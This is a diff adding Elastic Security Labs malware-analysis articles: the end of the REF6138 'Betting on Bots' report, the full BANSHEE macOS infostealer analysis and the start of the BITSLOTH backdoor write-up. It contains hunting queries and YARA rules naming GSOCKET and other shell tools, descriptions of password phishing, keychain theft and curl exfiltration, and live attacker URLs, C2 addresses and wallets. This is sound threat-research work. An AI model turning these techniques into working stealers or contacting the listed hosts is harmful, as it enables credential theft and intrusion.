Launched](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_potential_linux_hack_tool_launched.toml)\n* [Privilege Escalation via PKEXEC Exploitation](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/privilege_escalation_privilege_escalation_via_pkexec_exploitation.toml)\n* [Potential SSH-IT SSH Worm Downloaded](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/lateral_movement_potential_ssh_it_ssh_worm_downloaded.toml)\n* [Scheduled Job Executing Binary in Unusual Location](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_scheduled_job_executing_binary_in_unusual_location.toml)\n\nThe following YARA Signatures are in place to detect the KAIJI and RUDEDEVIL malware samples both as file and in-memory:\n\n* [Linux.Generic.Threat](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Linux_Generic_Threat.yar)\n* [Linux.Hacktool.Flooder](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Linux_Hacktool_Flooder.yar)\n\nThe following, soon to be released, endpoint rule alerts were observed throughout the analysis of this intrusion set:\n\n* Potential Shell via Web Server\n* Potential Web Server Code Injection\n* Potential Shell Executed by Web Server User\n* Decode Activity via Web Server\n* Linux Telegram API Request\n* Suspicious Echo Execution\n\n### Hunting queries in Elastic\n\nThe events for both KQL and EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries could return high signals or false positives. 
These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.\n\n#### EQL queries\n\nUsing the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below EQL queries to hunt for behaviors similar:\n\n**Potential XMRIG Execution**\n\nThe following EQL query can be used to hunt for XMRIG executions within your environment.\n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and (\n (\n process.args in (\"-a\", \"--algo\") and process.args in (\n \"gr\", \"rx/graft\", \"cn/upx2\", \"argon2/chukwav2\", \"cn/ccx\", \"kawpow\", \"rx/keva\", \"cn-pico/tlo\", \"rx/sfx\", \"rx/arq\",\n \"rx/0\", \"argon2/chukwa\", \"argon2/ninja\", \"rx/wow\", \"cn/fast\", \"cn/rwz\", \"cn/zls\", \"cn/double\", \"cn/r\", \"cn-pico\",\n \"cn/half\", \"cn/2\", \"cn/xao\", \"cn/rto\", \"cn-heavy/tube\", \"cn-heavy/xhv\", \"cn-heavy/0\", \"cn/1\", \"cn-lite/1\",\n \"cn-lite/0\", \"cn/0\"\n )\n ) or\n (\n process.args == \"--coin\" and process.args in (\"monero\", \"arqma\", \"dero\")\n )\n) and process.args in (\"-o\", \"--url\")\n```\n\n**MSR Write Access Enabled**\n\nXMRIG leverages modprobe to enable write access to MSR. This activity is abnormal, and should not occur by-default.\n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and process.name == \"modprobe\" and\nprocess.args == \"msr\" and process.args == \"allow_writes=on\"\n```\n\n**Potential GSOCKET Activity**\n\nThis activity is default behavior when deploying GSOCKET through the recommended deployment methods. Additionally, several arguments are added to the query to decrease the chances of missing a more customized intrusion through GSOCKET. 
\n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and\nprocess.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and\nprocess.command_line : (\n\"*GS_ARGS=*\", \"*gs-netcat*\", \"*gs-sftp*\", \"*gs-mount*\", \"*gs-full-pipe*\", \"*GS_NOINST=*\", \"*GSOCKET_ARGS=*\", \"*GS_DSTDIR=*\", \"*GS_URL_BASE=*\", \"*GS_OSARCH=*\", \"*GS_DEBUG=*\", \"*GS_HIDDEN_NAME=*\", \"*GS_HOST=*\", \"*GS_PORT=*\", \"*GS_TG_TOKEN=*\", \"*GS_TG_CHATID=*\", \"*GS_DISCORD_KEY=*\", \"*GS_WEBHOOK_KEY=*\"\n)\n```\n\n**Potential Process Masquerading via Exec**\n\nGSOCKET leverages the `exec -a` method to run a process under a different name. GSOCKET specifically leverages masquerades as kernel processes, but other malware may masquerade differently. \n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and\nprocess.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and process.args == \"-c\" and process.command_line : \"* exec -a *\"\n```\n\n**Renice or Ulimit Execution**\n\nSeveral malwares, including KAIJI and RUDEDEVIL, leverage the renice utility to change the priority of processes or set resource limits for processes. This is commonly used by miner malware to increase the priority of mining processes to maximize the mining performance.\n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and (\n process.name in (\"ulimit\", \"renice\") or (\n process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and process.args == \"-c\" and\n process.command_line : (\"*ulimit*\", \"*renice*\")\n )\n)\n```\n\n**Inexistent Cron(d) Service Started**\n\nBoth KAIJI and RUDEDEVIL establish persistence through the creation of a `cron(d)` service in `/etc/init.d/cron(d)`. `Cron`, by default, does not use a `SysV Init` service. 
Execution of a `cron(d)` service is suspicious and should be analyzed further.\n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and \n process.name == \"systemctl\" and process.args == \"start\" and process.args in \n (\"cron.service\", \"crond.service\", \"cron\", \"crond\")\n```\n\n**Suspicious /etc/ Process Execution from KAIJI**\n\nThe `/etc/` directory is not a commonly used directory for process executions. KAIJI is known to place a binary called `32678` and `id.services.conf` in the `/etc/` directory to establish persistence and evade detection.\n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and (process.executable regex \"\"\"/etc/[0-9].*\"\"\" or process.executable : (\"/etc/*.conf\", \"/etc/.*\"))\n```\n\n**Hidden File Creation in /dev/ directory**\n\nCreating hidden files in `/dev/` and `/dev/shm/` is not inherently malicious; however, this activity should be uncommon. KAIJI, GSOCKET, and other malware such as `K4SPREADER` are known to drop hidden files in these locations.\n\n```\nfile where event.type == \"creation\" and file.path : (\"/dev/shm/.*\", \"/dev/.*\")\n```\n\n**Suspicious Process Execution from Parent Executable in /boot/**\n\nMalware families such as KAIJI and XORDDOS are known to place executable files in the `/boot/` directory and leverage these to establish persistence while attempting to evade detection.\n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and process.parent.executable : \"/boot/*\"\n```\n\n#### YARA\n\nElastic Security has created YARA rules to identify this activity. 
Below is the YARA rule to identify the custom `Apache2` malware:\n\n```\nrule Linux_Trojan_Generic {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-09-20\"\n last_modified = \"2024-09-20\"\n os = \"Linux\"\n arch = \"x86\"\n threat_name = \"Linux.Trojan.Generic\"\n reference = \"https://www.elastic.co/security-labs/betting-on-bots\"\n license = \"Elastic License v2\"\n\n strings:\n $enc1 = { 74 73 0A 1C 1A 54 1A 11 54 0C 18 43 59 5B 3A 11 0B 16 14 10 0C 14 5B }\n $enc2 = { 18 1A 1A 1C 09 0D 43 59 0D 1C 01 0D 56 11 0D 14 15 55 18 09 09 15 10 }\n $enc3 = { 18 1A 1A 1C 09 0D 54 15 18 17 1E 0C 18 1E 1C 43 59 0B 0C }\n $enc4 = { 34 16 03 10 15 15 18 56 4C 57 49 59 51 2E 10 17 1D 16 0E 0A 59 37 }\n $key = \"yyyyyyyy\"\n condition:\n 1 of ($enc*) and $key\n}\n```\n\nTo detect GSOCKET, including several of its adjacent tools, we created the following signature:\n\n```\nrule Multi_Hacktool_Gsocket {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-09-20\"\n last_modified = \"2024-09-23\"\n os = \"Linux, MacOS\"\n arch = \"x86\"\n threat_name = \"Multi.Hacktool.Gsocket\"\n reference = \"https://www.elastic.co/security-labs/betting-on-bots\"\n license = \"Elastic License v2\"\n\n strings:\n $str1 = \"gsocket: gs_funcs not found\"\n $str2 = \"/share/gsocket/gs_funcs\"\n $str3 = \"$GSOCKET_ARGS\"\n $str4 = \"GSOCKET_SECRET\"\n $str5 = \"GS_HIJACK_PORTS\"\n $str6 = \"sftp -D gs-netcat\"\n $str7 = \"GS_NETCAT_BIN\"\n $str8 = \"GSOCKET_NO_GREETINGS\"\n $str9 = \"GS-NETCAT(1)\"\n $str10 = \"GSOCKET_SOCKS_IP\"\n $str11 = \"GSOCKET_SOCKS_PORT\"\n $str12 = \"gsocket(1)\"\n $str13 = \"gs-sftp(1)\"\n $str14 = \"gs-mount(1)\"\n condition:\n 3 of them\n}\n```\n\nFinally, the following signature was written to detect the [open source Ligolo-ng tool](https://github.com/nicocha30/ligolo-ng), as we have reason to believe this tool was used during this intrusion.\n\n\n```\nrule Linux_Hacktool_LigoloNG {\n meta:\n author = \"Elastic Security\"\n creation_date = 
\"2024-09-20\"\n last_modified = \"2024-09-20\"\n os = \"Linux\"\n arch = \"x86\"\n threat_name = \"Linux.Hacktool.LigoloNG\"\n reference = \"https://www.elastic.co/security-labs/betting-on-bots\"\n license = \"Elastic License v2\"\n\n strings:\n $a = \"https://github.com/nicocha30/ligolo-ng\"\n $b = \"@Nicocha30!\"\n $c = \"Ligolo-ng %s / %s / %s\"\n condition:\n all of them\n}\n```\n\n### Defensive recommendations\n\nTo effectively defend against malware campaigns and minimize the risk of intrusion, it’s crucial to implement a multi-layered approach to security. Here are some key defensive measures you should prioritize:\n\n1. **Keep Your Elastic Detection Rules Updated and Enabled**: Ensure that your security tools, including any pre-built detection rules, are up to date. Continuous updates allow your systems to detect the latest malware signatures and behaviors.\n2. **Enable Prevention Mode in Elastic Defend**: Configure Elastic Defend in prevention mode to automatically block known threats rather than just alerting on them. Prevention mode ensures proactive defense against malware and exploits.\n3. **Monitor Alerts and Logs**: Regularly monitor alerts, logs, and servers for any signs of suspicious activity. Early detection of unusual behavior can help prevent a small breach from escalating into a full-blown compromise.\n4. **Conduct Threat Hunting**: Proactively investigate your environment for hidden threats that may have evaded detection. Threat hunting can uncover advanced attacks and persistent malware that bypass traditional security measures.\n5. **Implement Web Application Firewalls (WAFs)**: Use a WAF to block unauthorized or malicious traffic. A properly configured firewall can prevent many common web attacks.\n6. **Enforce Strong Authentication for SSH**: Use public/private key authentication for SSH access to protect against brute force attacks.\n7. 
**Write Secure Code**: Ensure that all custom software, especially web server technology, follows secure coding practices. Engaging professional security auditors to review your code can help identify and mitigate vulnerabilities before they are exploited.\n8. **Regularly Patch and Update Systems**: Keeping servers, applications, and software up to date is essential to defending against known vulnerabilities. Prompt patching minimizes the risk of being targeted by off-the-shelf exploits.\n\nBy following these recommendations, you can significantly reduce the attack surface and strengthen your defense against ongoing or potential malware threats.\n\n## Observations\n\nThe following observables were discussed in this research. These are available for download in STIX or ECS format [here](https://github.com/elastic/labs-releases/tree/main/indicators/ref6138).\n\n| Observable | Type | Name | Reference |\n|-------------------------------------------------------------------------------------------------|-------------|------------------------|------------------------------------|\n| 72ac2877c9e4cd7d70673c0643eb16805977a9b8d55b6b2e5a6491db565cee1f | SHA-256 | SystemdXC | XMRIG |\n| 82c55c169b6cb5e348be6e202163296b2b5d80fff2be791c21da9a8b84188684 | SHA-256 | apache2 | apache2_unpacked |\n| 0fede7231267afc03b096ee6c1d3ded479b10ab235e260120bc9f68dd1fc54dd | SHA-256 | apache2_upx_packed | apache2_upx_packed |\n| 9ee695e55907a99f097c4c0ad4eb24ae5cf3f8215e9904d787817f1becb9449e | SHA-256 | download.sh | KAIJI Stager |\n| 1cdfb522acb1ad0745a4b88f072e40bf9aa113b63030fe002728bac50a46ae79 | SHA-256 | linux_386 | KAIJI x86 |\n| d0ef2f020082556884361914114429ed82611ef8de09d878431745ccd07c06d8 | SHA-256 | linux_amd64 | KAIJI x64 |\n| ad36cf59b5eb08799a50e9aece6f12cdfe8620062606ac6684d3b4509acc681b | SHA-256 | linux_arm5 | KAIJI ARM5 |\n| 792a84a5bc8530285e2f6eb997054edb3d43460a99a089468e2cf81b5fd5cde6 | SHA-256 | linux_arm6 | KAIJI ARM6 |\n| 
e19fb249db323d2388e91f92ff0c8a7a169caf34c3bdaf4d3544ce6bfb8b88b4 | SHA-256 | linux_arm64 | KAIJI ARM64 |\n| 3847c06f95dd92ec482212116408286986bb4b711e27def446fb4a524611b745 | SHA-256 | linux_arm7 | KAIJI ARM7 |\n| fffee23324813743b8660282ccd745daa6fb058f2bf84b9960f70d888cd33ba0 | SHA-256 | linux_mips | KAIJI MIPS |\n| 6d40b58e97c7b4c34f7b5bdac88f46e943e25faa887e0e6ce5f2855008e83f55 | SHA-256 | linux_mips64 | KAIJI MIPS64 |\n| 0c3442b8c49844a1ee41705a9e4a710ae3c7cde76c69c2eab733366b2aa34814 | SHA-256 | linux_mips64el | KAIJI MIPS64 little-endian |\n| 310973f6f186947cb7cff0e7b46b4645acdd71e90104f334caa88a4fa8ad9988 | SHA-256 | linux_mips_softfloat | KAIJI MIPS softfloat |\n| 0d24a2e7da52bad03b0bda45c8435a29c4e1c9b483e425ae71b79fd122598527 | SHA-256 | linux_mipsel | KAIJI MIPS little-endian |\n| 36fc8eef2e1574e00ba3cf9e2267d4d295f6e9f138474e3bd85eb4d215f63196 | SHA-256 | linux_mipsel_softfloat | KAIJI MIPS little-endian softfloat |\n| 3c25a4406787cc5089e83e00350e49eb9f192d03d69e7a61b780b6828db1344f | SHA-256 | linux_ppc64 | KAIJI PPC64 |\n| 7c16149db7766c6fd89f28031aa123408228f045e90aa03828c02562d9f9d1d7 | SHA-256 | linux_ppc64el | KAIJI PPC64 little-endian |\n| 09f935acbac36d224acfb809ad82c475d53d74ab505f057f5ac40611d7c3dbe7 | SHA-256 | l64_v0 | RUDEDEVIL/LUFICER x64 version 0 |\n| ea0068702ea65725700b1dad73affe68cf29705c826d12a497dccf92d3cded46 | SHA-256 | l64_v1 | RUDEDEVIL/LUFICER x64 version 1 |\n| 160f232566968ade54ee875def81fc4ca69e5507faae0fceb5bef6139346496a | SHA-256 | l64_v2 | RUDEDEVIL/LUFICER x64 version 2 |\n| 89b60cedc3a4efb02ceaf629d6675ec9541addae4689489f3ab8ec7741ec8055 | SHA-256 | l64_v3 | RUDEDEVIL/LUFICER x64 version 3 |\n| 20899c5e2ecd94b9e0a8d1af0114332c408fb65a6eb3837d4afee000b2a0941b | SHA-256 | l86_v0 | RUDEDEVIL/LUFICER x86 version 0 |\n| 728dce11ffd7eb35f80553d0b2bc82191fe9ff8f0d0750fcca04d0e77d5be28c | SHA-256 | l86_v1 | RUDEDEVIL/LUFICER x86 version 1 |\n| 47ceca049bfcb894c9a229e7234e8146d8aeda6edd1629bc4822ab826b5b9a40 | SHA-256 | l86_v2 
| RUDEDEVIL/LUFICER x86 version 2 |\n| e89f4073490e48aa03ec0256d0bfa6cf9c9ac6feb271a23cb6bc571170d1bcb5 | SHA-256 | l86_v3 | RUDEDEVIL/LUFICER x86 version 3 |\n| d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60 | SHA-256 | hjvhg.exe | Miner |\n| 54a5c82e4c68c399f56f0af6bde9fb797122239f0ebb8bcdb302e7c4fb02e1de | SHA-256 | mvhhvcp3.exe | DONUT LOADER |\n| 9e32be17b25d3a6c00ebbfd03114a0947361b4eaf4b0e9d6349cbb95350bf976 | SHA-256 | vdfgb.exe | Miner |\n| http://gcp.pagaelrescate[.]com:8080/ifindyou | url | ifindyou.sh | Stage 1 |\n| http://gcp.pagaelrescate[.]com:8080/cycnet | url | cycnet.sh | Stage 2 |\n| http://gcp.pagaelrescate[.]com:8080/testslot/enviador_slot | url | Enviador_slot.py | Stage 3 |\n| http://gcp.pagaelrescate[.]com:8080/t9r/SystemdXC | url | SystemdXC | XMRIG |\n| http://38.54.125[.]192:8080/nginx-rc | url | nginx-rc | LIGOLO-NG |\n| http://62.72.22[.]91/apache2 | url | apache2 | Custom Malware |\n| http://62.72.22[.]91/apache2v86 | url | apache2v86 | Custom Malware |\n| http://91.92.241[.]103:8002/gk.php | url | gk.php | PHP Backdoor |\n| http://hfs.t1linux[.]com:7845/scdsshfk | url | scdsshfk | XMRIG |\n| gcp.pagaelrescate[.]com | domain-name | | REF Hosting domain |\n| nishabii[.]xyz | domain-name | | RUDEDEVIL C2 |\n| 3.147.53[.]183 | ipv4-addr | | Python Reverse Shell C2 |\n| 38.54.125[.]192 | ipv4-addr | | C2 Server |\n| 107.178.101[.]245 | ipv4-addr | | Malware File Server (Rejetto) |\n| 62.72.22[.]91 | ipv4-addr | | Server Hosting Malware |\n| 91.92.241[.]103 | ipv4-addr | | C2 Server |\n| 61.160.194[.]160 | ipv4-addr | | Server Hosting Malware |\n| 41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL | XMR Wallet | | RUDEDEVIL/LUFICER mining wallet |\n| 42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc | XMR Wallet | | RUDEDEVIL/LUFICER mining wallet |\n| 1CSUkd5FZMis5NDauKLDkcpvvgV1zrBCBz | BTC Wallet | | XMRIG mining wallet |\n\n## 
References\n\nThe following were referenced throughout the above research:\n\n* [https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html](https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html)\n* [https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/](https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/)\n* [https://www.fortinet.com/blog/threat-research/multiple-threats-target-adobe-coldfusion-vulnerabilities](https://www.fortinet.com/blog/threat-research/multiple-threats-target-adobe-coldfusion-vulnerabilities)\n* [https://www.aquasec.com/blog/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack/](https://www.aquasec.com/blog/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack/)\n* [https://github.com/hackerschoice/gsocket](https://github.com/hackerschoice/gsocket)"
+ },
+ "title": "Betting on Bots: Investigating Linux malware, crypto mining, and gambling API abuse",
+ "slug": "betting-on-bots",
+ "date": "2024-09-27",
+ "description": "The REF6138 campaign involved cryptomining, DDoS attacks, and potential money laundering via gambling APIs, highlighting the attackers' use of evolving malware and stealthy communication channels.",
+ "author": [
+ {
+ "slug": "remco-sprooten"
+ },
+ {
+ "slug": "ruben-groenewoud"
+ }
+ ],
+ "image": "betting-on-bots.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ },
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "linux",
+ "kaiji",
+ "rudedevil",
+ "gsocket",
+ "cryptomining"
+ ]
+ },
+ "id": "security_labs_content-betting_on_bots-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-beyond_the_wail-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-beyond_the_wail-md.json
new file mode 100644
index 00000000000..f580b1535a6
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-beyond_the_wail-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Beyond the wail: deconstructing the BANSHEE infostealer\"\nslug: \"beyond-the-wail\"\ndate: \"2024-08-15\"\ndescription: \"The BANSHEE malware is a macOS-based infostealer that targets system information, browser data, and cryptocurrency wallets.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"beyond-the-wail.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - macos\n - infostealer\n - BANSHEE\n---\n\n## Preamble\n\nIn August 2024, a novel macOS malware named \"BANSHEE Stealer\" emerged, catching the attention of the cybersecurity community. Reportedly developed by Russian threat actors, BANSHEE Stealer was introduced on an underground forum and is designed to function across both macOS x86_64 and ARM64 architectures. \n\nThis malware presents a severe risk to macOS users, targeting vital system information, browser data, and cryptocurrency wallets.\n\nWith a steep monthly subscription price of $3,000, BANSHEE Stealer stands out in the market, particularly compared to known stealers like AgentTesla. \n\nAs macOS increasingly becomes a prime target for cybercriminals, BANSHEE Stealer underscores the rising prevalence of macOS-specific malware. 
This analysis explores the technical details of BANSHEE Stealer, aiming to help the community understand its impact and stay informed about emerging threats.\n\n\n\n\n## Key takeaways\n\n* BANSHEE Stealer highlights the growing number of macOS malware samples as the OS becomes a more attractive target for cyber threats.\n* BANSHEE Stealer's $3,000 monthly price is notably high compared to Windows-based stealers.\n* BANSHEE Stealer targets a wide range of browsers, cryptocurrency wallets, and around 100 browser extensions, making it a highly versatile and dangerous threat.\n\n## Malware Analysis\n\nThe malware we analyzed in this research contained all the C++ symbols, which is interesting as we can guess the project's code structure by knowing these source code file names, as seen in the picture below. Looking into the C++-generated global variable initialization functions, we can find values set automatically/manually by the user during the build process, like the remote IP, encryption key, build ID, etc.\n\n\n\nThe following table summarizes the leaked `.cpp` file names through the symbols in the binary.\n\n| File name | Description |\n|----------------|----------------------------------------------------------------------------------------------------------------------|\n| `Controller.cpp` | Manages core execution tasks, including anti-debugging measures, language checks, data collection, and exfiltration. |\n| `Browsers.cpp` | Handles the collection of data from various web browsers. |\n| `System.cpp` | Executes AppleScripts to gather system information and perform password phishing. |\n| `Tools.cpp` | Provides utility functions for encryption, directory creation, and compression etc. |\n| `Wallets.cpp` | Responsible for collecting data from cryptocurrency wallets. |\n\n### Debugger, VM Detection, and Language Checks\n\n\n\nBANSHEE Stealer uses basic techniques to evade detection. 
It detects debugging by utilizing the [sysctl](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/sysctl.3.html) API.\n\n\n\nFor virtualization detection, it runs the command `system_profiler SPHardwareDataType | grep 'Model Identifier'` to determine whether the string `Virtual` appears in the hardware model identifier, which suggests a virtual machine. These methods are relatively simple and can be easily circumvented by advanced sandboxes and malware analysts.\n\n\n\nAdditionally, it parses the user-preferred canonicalized language returned from the [CFLocaleCopyPreferredLanguages](https://developer.apple.com/documentation/corefoundation/1542887-cflocalecopypreferredlanguages) API and looks for the string `ru`. This tactic helps the malware avoid infecting systems where Russian is the primary language.\n\n### System information collection\n\n#### User password\n\nThe malware creates an [Osascript](https://ss64.com/mac/osascript.html) password prompt with a dialog stating that, to launch the application, the user needs to update the system settings and enter their password.\n\nWhen the user enters the password, it will be validated using the [dscl](https://ss64.com/mac/dscl.html) command by running `dscl Local/Default -authonly `\n\nIf valid, the password will be written to the following file `/Users//password-entered`.\n\n\n\nThese credentials can be leveraged to decrypt the keychain data stored on the system, granting access to all saved passwords.\n\n#### File, software, and hardware information collection\n\nThe function `System::collectSystemInfo` collects system information and serializes it in a JSON object. It executes the command `system_profiler SPSoftwareDataType SPHardwareDataType`, which provides details about the system’s software and hardware. 
It gets the machine's public IP by requesting it from `freeipapi.com` through the built-in macOS `cURL` command.\n\nThe JSON file will be saved under `/system_info.json`.\n\nBANSHEE stealer executes AppleScripts; interestingly, it writes the AppleScripts to the same file `/tmp/tempAppleScript`.\n\nThe first script to be executed mutes the system sound with the `osascript -e 'set volume with output muted'` command. It then collects various files from the system, which are listed below:\n\n* Safari cookies\n* Notes database\n* Files with the following extensions `.txt`, `.docx`, `.rtf`, `.doc`, `.wallet`, `.keys`, or `.key` from the Desktop and Documents folders.\n\n#### Dump keychain passwords\n\nIt copies the keychain of the system `/Library/Keychains/login.keychain-db` to `/Passwords`.\n\n### Browser collection\n\nBANSHEE currently collects data from 9 different browsers, including browser history, cookies, logins, and more:\n\n* Chrome\n* Firefox\n* Brave\n* Edge\n* Vivaldi\n* Yandex\n* Opera\n* OperaGX\n\nRegarding Safari, only the cookies are collected by the AppleScript script for the current version.\n\n\n\nAdditionally, data from approximately 100 browser plugins are collected from the machine. A list of these extension IDs is provided at the end of the blog post.\n\nThe collected files are saved under `/Browsers`.\n\n### Wallet collection\n\nBANSHEE collects data from the following cryptocurrency wallets:\n\n* Exodus\n* Electrum\n* Coinomi\n* Guarda\n* Wasabi Wallet\n* Atomic\n* Ledger\n\nThe collected wallets are stored under `/Wallets`.\n\n### Exfiltration\n\nAfter the malware finishes collecting data, it first ZIP compresses the temporary folder using the `ditto` command. 
The zip file is then XOR encrypted and base64 encoded and sent through a post request to the URL: `http://45.142.122[.]92/send/` with the built-in cURL command.\n\n\n\n## Behavior detection\n\n* [Crypto Wallet File Access by Unsigned or Untrusted Binary](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/macos/credential_access_crypto_wallet_file_access_by_unsigned_or_untrusted_binary.toml)\n* [Web Browser Credential Data Accessed by Unsigned or Untrusted Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/macos/credential_access_web_browser_credential_data_accessed_by_unsigned_or_untrusted_process.toml)\n* [Osascript Payload Drop and Execute](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/macos/command_and_control_osascript_payload_drop_and_execute.toml)\n* [Potential Credentials Phishing via Osascript](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/macos/credential_access_potential_credentials_phishing_via_osascript.toml)\n\n## YARA rule\n\nElastic Security has created YARA rules to identify this activity. 
Below are YARA rules to identify the BANSHEE malware:\n\n```\nrule Macos_Infostealer_Banshee {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-08-13\"\n last_modified = \"2024-08-13\"\n os = \"MacOS\"\n arch = \"x86, arm64\"\n category_type = \"Infostealer\"\n family = \"Banshee\"\n threat_name = \"Macos.Infostealer.Banshee\"\n license = \"Elastic License v2\"\n\n strings:\n $str_0 = \"No debugging, VM, or Russian language detected.\" ascii fullword\n $str_1 = \"Remote IP: \" ascii fullword\n $str_2 = \"Russian language detected!\" ascii fullword\n $str_3 = \" is empty or does not exist, skipping.\" ascii fullword\n $str_4 = \"Data posted successfully\" ascii fullword\n $binary_0 = { 8B 55 BC 0F BE 08 31 D1 88 08 48 8B 45 D8 48 83 C0 01 48 89 45 D8 E9 }\n $binary_1 = { 48 83 EC 60 48 89 7D C8 48 89 F8 48 89 45 D0 48 89 7D F8 48 89 75 F0 48 89 55 E8 C6 45 E7 00 }\n condition:\n all of ($str_*) or all of ($binary_*)\n}\n```\n\n## Conclusion\n\nBANSHEE Stealer is macOS-based malware that can collect extensive data from the system, browsers, cryptocurrency wallets, and numerous browser extensions. Despite its potentially dangerous capabilities, the malware's lack of sophisticated obfuscation and the presence of debug information make it easier for analysts to dissect and understand. 
While BANSHEE Stealer is not overly complex in its design, its focus on macOS systems and the breadth of data it collects make it a significant threat that demands attention from the cybersecurity community.\n\n## Observables\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/banshee) in both ECS and STIX format in a combined zip bundle.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|------------------------------------------------------------------|-----------|-----------------|--------------------|\n| 11aa6eeca2547fcf807129787bec0d576de1a29b56945c5a8fb16ed8bf68f782 | SHA-256 | BANSHEE stealer | |\n| 45.142.122[.]92 | ipv4-addr | | BANSHEE stealer C2 |"
+ },
+ "title": "Beyond the wail: deconstructing the BANSHEE infostealer",
+ "slug": "beyond-the-wail",
+ "date": "2024-08-15",
+ "description": "The BANSHEE malware is a macOS-based infostealer that targets system information, browser data, and cryptocurrency wallets.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "beyond-the-wail.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "macos",
+ "infostealer",
+ "BANSHEE"
+ ]
+ },
+ "id": "security_labs_content-beyond_the_wail-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bits_and_bytes_analyzing_bitsloth-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bits_and_bytes_analyzing_bitsloth-md.json
new file mode 100644
index 00000000000..c62466ec795
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-bits_and_bytes_analyzing_bitsloth-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"BITS and Bytes: Analyzing BITSLOTH, a newly identified backdoor\"\nslug: \"bits-and-bytes-analyzing-bitsloth\"\ndate: \"2024-08-01\"\ndescription: \"Elastic Security Labs identified a novel Windows backdoor leveraging the Background Intelligent Transfer Service (BITS) for C2. This malware was found during a recent activity group tracked as REF8747.\"\nauthor:\n - slug: seth-goodwin\n - slug: daniel-stepanic\nimage: \"Security Labs Images 29.jpg\"\ncategory:\n - slug: malware-analysis\n---\n\n## BITSLOTH at a glance\n\nBITSLOTH is a newly discovered Windows backdoor that leverages the Background Intelligent Transfer Service (BITS) as its command-and-control mechanism. BITSLOTH was uncovered during an intrusion within the LATAM region earlier this summer. This malware hasn't been publicly documented to our knowledge, and while it’s not clear who’s behind the malware, it has been in development for several years based on tracking distinct versions uploaded to VirusTotal.\n\nThe most current iteration of the backdoor at the time of this publication has 35 handler functions, including keylogging and screen capture capabilities. In addition, BITSLOTH contains many different features for discovery, enumeration, and command-line execution. Based on these capabilities, we assess this tool is designed for gathering data from victims.\n\n### Key takeaways\n\n - BITSLOTH is a newly discovered Windows backdoor\n - BITSLOTH uses a built-in Microsoft feature, Background Intelligent Transfer Service (BITS) for command-and-control communication \n - BITSLOTH has numerous command handlers used for discovery/enumeration, execution, and collection purposes\n - The backdoor contains logging functions and strings consistent with the authors being native Chinese speakers\n\n## Discovery\n\nOur team observed BITSLOTH installed on a server environment on June 25th during REF8747, an intrusion into the Foreign Ministry of a South American government. 
